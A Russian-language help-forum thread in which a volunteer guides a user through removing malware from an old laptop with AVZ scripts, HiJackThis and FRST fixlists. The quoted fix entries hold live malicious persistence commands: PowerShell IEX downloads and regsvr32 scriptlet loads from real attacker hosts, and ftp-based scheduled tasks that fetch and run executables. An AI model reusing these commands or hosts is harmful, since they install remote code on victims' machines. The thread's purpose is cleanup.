Larisa46 0 Опубликовано 5 января, 2020 Share Опубликовано 5 января, 2020 Дано - старинный ноутбук который серфил черт знает что в течение 3х лет.(пользовался пенсионер)Жесткие тормоза, постоянные вылеты непонятных окон и так далее.Логи ниже, буду рад помощи. CollectionLog-2020.01.05-20.47.zip 1 Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 5 января, 2020 Share Опубликовано 5 января, 2020 Внимание! Рекомендации написаны специально для этого пользователя. Если рекомендации написаны не для вас, не используйте их - это может повредить вашей системе. Если у вас похожая проблема - создайте тему в разделе Уничтожение вирусов и выполните Правила оформления запроса о помощи. Здравствуйте! Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Важно! на Windows Vista/7/8 AVZ запускайте через контекстное меню проводника от имени Администратора. Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced','HideFileExt', 0); TerminateProcessByName('C:\Windows\inf\aspnet\lsma12.exe'); DeleteFile('C:\Windows\inf\aspnet\lsma12.exe','32'); DeleteSchedulerTask('Mysa'); DeleteFile('c:\windows\update.exe>','64'); DeleteSchedulerTask('Mysa1'); DeleteSchedulerTask('Mysa2'); DeleteSchedulerTask('Mysa3'); DeleteSchedulerTask('ok'); DeleteSchedulerTask('oka'); DeleteFile('c:\windows\debug\item.dat','64'); DeleteFile('c:\windows\debug\item.dat>','64'); DeleteFile('c:\windows\help\lsmosee.exe>','64'); DeleteFile('c:\windows\debug\ok.dat','64'); DeleteFile('c:\windows\inf\aspnet\lsma12.exe','64'); ExecuteWizard('TSW',2,3,true); ExecuteSysClean; RebootWindows(true); end. Внимание! Будет выполнена перезагрузка компьютера. Пофиксите следующие строчки в HiJackThis (используйте версию из папки Автологгера). O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll®svr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll®svr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll®svr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll®svr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll®svr32 /u /s /i:http://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl" Сделайте новые логи Автологгером. 1 Ссылка на сообщение Поделиться на другие сайты
Larisa46 0 Опубликовано 5 января, 2020 Автор Share Опубликовано 5 января, 2020 Внимание! Рекомендации написаны специально для этого пользователя. Если рекомендации написаны не для вас, не используйте их - это может повредить вашей системе. Если у вас похожая проблема - создайте тему в разделе Уничтожение вирусов и выполните Правила оформления запроса о помощи. Здравствуйте! Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Важно! на Windows Vista/7/8 AVZ запускайте через контекстное меню проводника от имени Администратора. Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced','HideFileExt', 0); TerminateProcessByName('C:\Windows\inf\aspnet\lsma12.exe'); DeleteFile('C:\Windows\inf\aspnet\lsma12.exe','32'); DeleteSchedulerTask('Mysa'); DeleteFile('c:\windows\update.exe>','64'); DeleteSchedulerTask('Mysa1'); DeleteSchedulerTask('Mysa2'); DeleteSchedulerTask('Mysa3'); DeleteSchedulerTask('ok'); DeleteSchedulerTask('oka'); DeleteFile('c:\windows\debug\item.dat','64'); DeleteFile('c:\windows\debug\item.dat>','64'); DeleteFile('c:\windows\help\lsmosee.exe>','64'); DeleteFile('c:\windows\debug\ok.dat','64'); DeleteFile('c:\windows\inf\aspnet\lsma12.exe','64'); ExecuteWizard('TSW',2,3,true); ExecuteSysClean; RebootWindows(true); end. Внимание! Будет выполнена перезагрузка компьютера. Пофиксите следующие строчки в HiJackThis (используйте версию из папки Автологгера). O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll®svr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll®svr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll®svr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll®svr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll®svr32 /u /s /i:http://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl" Сделайте новые логи Автологгером. Так же ноутбук не автозагружает антивирус eset. После установки он просто висит в панели пуск и не запускается даже по клику. После выполнения скрипта так же периодически компьютер уходит в перезагрузку без каких либо ошибок. CollectionLog-2020.01.05-23.10.zip Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 5 января, 2020 Share Опубликовано 5 января, 2020 Пофиксите следующие строчки в HiJackThis O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll (HKLM) (2020/01/05) O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file) O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa O22 - Task: oka - C:\Windows\system32\cmd.exe /c start c:\windows\inf\aspnet\lsma12.exe Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Важно! на Windows Vista/7/8 AVZ запускайте через контекстное меню проводника от имени Администратора. Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin TerminateProcessByName('C:\Windows\inf\aspnet\lsma12.exe'); DeleteFile('C:\Windows\inf\aspnet\lsma12.exe','32'); DeleteSchedulerTask('Mysa'); DeleteSchedulerTask('Mysa1'); DeleteSchedulerTask('Mysa2'); DeleteSchedulerTask('Mysa3'); DeleteSchedulerTask('ok'); DeleteSchedulerTask('oka'); ExecuteSysClean; ExecuteWizard('TSW',2,2,true); RebootWindows(true); end. Внимание! Будет выполнена перезагрузка компьютера. Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. Убедитесь, что под окном Optional Scan отмечены "List BCD", "Driver MD5" и "90 Days Files". Нажмите кнопку Scan. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении. Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении. 1 Ссылка на сообщение Поделиться на другие сайты
Larisa46 0 Опубликовано 5 января, 2020 Автор Share Опубликовано 5 января, 2020 PS. Компьютер уходит в перезагрузку после установки антивируса. После перезагрузки следов антивируса нет. Как будто идёт откат на 10-15 минут... Вот так вот "интересно" PS. Компьютер уходит в перезагрузку после установки антивируса. После перезагрузки следов антивируса нет. Как будто идёт откат на 10-15 минут... Вот так вот "интересно" Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 5 января, 2020 Share Опубликовано 5 января, 2020 С антивирусом потом разберемся. Выполняйте рекомендации из поста 4. Ссылка на сообщение Поделиться на другие сайты
Larisa46 0 Опубликовано 6 января, 2020 Автор Share Опубликовано 6 января, 2020 С антивирусом потом разберемся. Выполняйте рекомендации из поста 4. Прикрепляю все необходимое CollectionLog-2020.01.06-11.23.zip Addition.txt FRST.txt Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 6 января, 2020 Share Опубликовано 6 января, 2020 ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows! Временно выгрузите антивирус, файрволл и прочее защитное ПО. Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool: CreateRestorePoint: CloseProcesses: HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION Task: {4E5BA01A-934F-4798-98A6-C0A3EB8AF188} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION Task: {5F519660-63F1-4E10-A9BA-D010C83FAEA0} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION Task: {8F4E2712-B7A0-43F5-91CC-8606065C577A} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION Task: {91F71B01-BAE4-48BE-B395-859065C0D04A} - System32\Tasks\oka => cmd /c start c:\windows\inf\aspnet\lsma12.exe Task: {DB4EEAC8-A4E6-4D91-B0CA-581FDCC186F3} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION Task: {DEF324ED-E9C9-4958-985D-59F474BCFA0B} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{e7acac32-5a1a-4d10-abc6-11654cb21a41} <==== ATTENTION (Restriction - IP) 2020-01-06 10:54 - 2020-01-06 10:54 - 000003170 _____ C:\Windows\system32\Tasks\oka 2020-01-06 10:53 - 2020-01-06 10:54 - 000003520 _____ C:\Windows\system32\Tasks\Mysa 2020-01-06 10:53 - 2020-01-06 10:54 - 000003506 _____ C:\Windows\system32\Tasks\Mysa3 2020-01-06 10:53 - 2020-01-06 10:54 - 000003426 _____ C:\Windows\system32\Tasks\Mysa2 2020-01-06 10:53 - 2020-01-06 10:54 - 000003190 _____ C:\Windows\system32\Tasks\Mysa1 2020-01-06 10:53 - 2020-01-06 10:54 - 000003186 _____ C:\Windows\system32\Tasks\ok 2019-11-11 17:38 - 2019-12-26 20:39 - 000000254 _____ C:\Windows\system32\n1.dat 2019-11-11 17:38 - 2019-12-26 20:39 - 000000254 _____ C:\Windows\system32\n.dat 2020-01-06 10:41 - 2019-03-04 20:45 - 000000081 _____ C:\Windows\system32\s 2020-01-06 10:41 - 2019-03-04 20:45 - 000000079 _____ C:\Windows\system32\ps 2020-01-06 10:41 - 2019-03-04 20:45 - 000000077 _____ C:\Windows\system32\p 2019-03-04 18:55 - 2019-10-19 19:39 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat 2018-07-20 22:01 - 2018-07-20 22:01 - 000004096 ____H () C:\Users\Samsung\AppData\Local\keyfile3.drm WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\":: WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATTENTION WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99] WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (the data entry has 797 more characters).] <==== ATTENTION WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate] Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен. Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму Сделайте новые логи FRST. 1 Ссылка на сообщение Поделиться на другие сайты
Larisa46 0 Опубликовано 6 января, 2020 Автор Share Опубликовано 6 января, 2020 ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows! Временно выгрузите антивирус, файрволл и прочее защитное ПО. Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool: CreateRestorePoint: CloseProcesses: HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION Task: {4E5BA01A-934F-4798-98A6-C0A3EB8AF188} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION Task: {5F519660-63F1-4E10-A9BA-D010C83FAEA0} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION Task: {8F4E2712-B7A0-43F5-91CC-8606065C577A} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION Task: {91F71B01-BAE4-48BE-B395-859065C0D04A} - System32\Tasks\oka => cmd /c start c:\windows\inf\aspnet\lsma12.exe Task: {DB4EEAC8-A4E6-4D91-B0CA-581FDCC186F3} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION Task: {DEF324ED-E9C9-4958-985D-59F474BCFA0B} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{e7acac32-5a1a-4d10-abc6-11654cb21a41} <==== ATTENTION (Restriction - IP) 2020-01-06 10:54 - 2020-01-06 10:54 - 000003170 _____ C:\Windows\system32\Tasks\oka 2020-01-06 10:53 - 2020-01-06 10:54 - 000003520 _____ C:\Windows\system32\Tasks\Mysa 2020-01-06 10:53 - 2020-01-06 10:54 - 000003506 _____ C:\Windows\system32\Tasks\Mysa3 2020-01-06 10:53 - 2020-01-06 10:54 - 000003426 _____ C:\Windows\system32\Tasks\Mysa2 2020-01-06 10:53 - 2020-01-06 10:54 - 000003190 _____ C:\Windows\system32\Tasks\Mysa1 2020-01-06 10:53 - 2020-01-06 10:54 - 000003186 _____ C:\Windows\system32\Tasks\ok 2019-11-11 17:38 - 2019-12-26 20:39 - 000000254 _____ C:\Windows\system32\n1.dat 2019-11-11 17:38 - 2019-12-26 20:39 - 000000254 _____ C:\Windows\system32\n.dat 2020-01-06 10:41 - 2019-03-04 20:45 - 000000081 _____ C:\Windows\system32\s 2020-01-06 10:41 - 2019-03-04 20:45 - 000000079 _____ C:\Windows\system32\ps 2020-01-06 10:41 - 2019-03-04 20:45 - 000000077 _____ C:\Windows\system32\p 2019-03-04 18:55 - 2019-10-19 19:39 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat 2018-07-20 22:01 - 2018-07-20 22:01 - 000004096 ____H () C:\Users\Samsung\AppData\Local\keyfile3.drm WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\":: WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATTENTION WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99] WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (the data entry has 797 more characters).] <==== ATTENTION WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate] Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен. Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму Сделайте новые логи FRST. FRST.txt Addition.txt Fixlog.txt Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 6 января, 2020 Share Опубликовано 6 января, 2020 Скачайте архив TDSSKiller.zip и распакуйте его в отдельную папку; Запустите файл TDSSKiller.exe. Нажмите кнопку "Начать проверку". Не меняйте настройки сканирования по умолчанию. В процессе проверки могут быть обнаружены объекты двух типов: вредоносные (точно было установлено, какой вредоносной программой поражен объект); подозрительные (тип вредоносного воздействия точно установить невозможно). [*]По окончании проверки утилита выводит список обнаруженных объектов с их подробным описанием. [*]Для вредоносных объектов утилита автоматически определяет действие: Лечить или Удалить. [*]Для подозрительных объектов утилита предоставляет выбор действия пользователю (по умолчанию Пропустить). [*]Самостоятельно без указания консультанта ничего не удаляйте!!! [*]После нажатия кнопки Продолжить утилита выполняет выбранные действия и выводит результат. [*]Прикрепите лог утилиты к своему следующему сообщению По умолчанию утилита выводит отчет работы в корень системного диска (диска, на котором установлена операционная система, как правило, это диск С:\). Имя отчета имеет следующий вид: ИмяУтилиты.Версия_Дата_Время_log.txt Например, C:\TDSSKiller.2.4.7_23.07.2010_15.31.43_log.txt Ссылка на сообщение Поделиться на другие сайты
Larisa46 0 Опубликовано 6 января, 2020 Автор Share Опубликовано 6 января, 2020 Скачайте архив TDSSKiller.zip и распакуйте его в отдельную папку; Запустите файл TDSSKiller.exe. Нажмите кнопку "Начать проверку". Не меняйте настройки сканирования по умолчанию. В процессе проверки могут быть обнаружены объекты двух типов: вредоносные (точно было установлено, какой вредоносной программой поражен объект); подозрительные (тип вредоносного воздействия точно установить невозможно). По окончании проверки утилита выводит список обнаруженных объектов с их подробным описанием. Для вредоносных объектов утилита автоматически определяет действие: Лечить или Удалить. Для подозрительных объектов утилита предоставляет выбор действия пользователю (по умолчанию Пропустить). Самостоятельно без указания консультанта ничего не удаляйте!!! После нажатия кнопки Продолжить утилита выполняет выбранные действия и выводит результат. Прикрепите лог утилиты к своему следующему сообщению По умолчанию утилита выводит отчет работы в корень системного диска (диска, на котором установлена операционная система, как правило, это диск С:\). Имя отчета имеет следующий вид: ИмяУтилиты.Версия_Дата_Время_log.txt Например, C:\TDSSKiller.2.4.7_23.07.2010_15.31.43_log.txt Два лога, после первой проверки и после перезагрузки TDSSKiller.3.1.0.28_06.01.2020_20.46.47_log.txt TDSSKiller.3.1.0.28_06.01.2020_20.49.34_log.txt Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 6 января, 2020 Share Опубликовано 6 января, 2020 ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows! Временно выгрузите антивирус, файрволл и прочее защитное ПО Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool: CreateRestorePoint: CloseProcesses: HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION HKU\S-1-5-21-3989281321-2876134707-2914065694-1000\...\MountPoints2: {f81134cf-bd50-11e7-9000-806e6f6e6963} - E:\wpi\MInst.exe Task: {033BE705-E2E4-4C7B-89AD-6DD61789B501} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION Task: {10886A58-E130-49F1-89F3-85AA7CAA6CBD} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION Task: {72F83CA1-2DA5-4AEE-B874-E36A46146CB2} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION Task: {B0DA8B18-0966-441C-A91C-5E5431CEA4CA} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION Task: {B3452BF4-16AA-429B-9648-A8476C911274} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{d898aa95-b9f9-4764-a724-f740df323b8b} <==== ATTENTION (Restriction - IP) 2020-01-06 18:47 - 2020-01-06 18:47 - 000003170 _____ C:\Windows\system32\Tasks\oka 2020-01-06 18:44 - 2020-01-06 18:47 - 000003520 _____ C:\Windows\system32\Tasks\Mysa 2020-01-06 18:44 - 2020-01-06 18:47 - 000003506 _____ C:\Windows\system32\Tasks\Mysa3 2020-01-06 18:44 - 2020-01-06 18:47 - 000003426 _____ C:\Windows\system32\Tasks\Mysa2 2020-01-06 18:44 - 2020-01-06 18:47 - 000003190 _____ C:\Windows\system32\Tasks\Mysa1 2020-01-06 18:44 - 2020-01-06 18:47 - 000003186 _____ C:\Windows\system32\Tasks\ok WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATTENTION WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (the data entry has 797 more characters).] <==== ATTENTION Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен. Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму Сделайте новые логи FRST. Ссылка на сообщение Поделиться на другие сайты
Larisa46 0 Опубликовано 6 января, 2020 Автор Share Опубликовано 6 января, 2020 ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows! Временно выгрузите антивирус, файрволл и прочее защитное ПО Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool: CreateRestorePoint: CloseProcesses: HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION HKU\S-1-5-21-3989281321-2876134707-2914065694-1000\...\MountPoints2: {f81134cf-bd50-11e7-9000-806e6f6e6963} - E:\wpi\MInst.exe Task: {033BE705-E2E4-4C7B-89AD-6DD61789B501} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION Task: {10886A58-E130-49F1-89F3-85AA7CAA6CBD} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION Task: {72F83CA1-2DA5-4AEE-B874-E36A46146CB2} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION Task: {B0DA8B18-0966-441C-A91C-5E5431CEA4CA} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION Task: {B3452BF4-16AA-429B-9648-A8476C911274} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{d898aa95-b9f9-4764-a724-f740df323b8b} <==== ATTENTION (Restriction - IP) 2020-01-06 18:47 - 2020-01-06 18:47 - 000003170 _____ C:\Windows\system32\Tasks\oka 2020-01-06 18:44 - 2020-01-06 18:47 - 000003520 _____ C:\Windows\system32\Tasks\Mysa 2020-01-06 18:44 - 2020-01-06 18:47 - 000003506 _____ C:\Windows\system32\Tasks\Mysa3 2020-01-06 18:44 - 2020-01-06 18:47 - 000003426 _____ C:\Windows\system32\Tasks\Mysa2 2020-01-06 18:44 - 2020-01-06 18:47 - 000003190 _____ C:\Windows\system32\Tasks\Mysa1 2020-01-06 18:44 - 2020-01-06 18:47 - 000003186 _____ C:\Windows\system32\Tasks\ok WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATTENTION WMI:subscription\__EventFilter->fuckamm3::[Query => 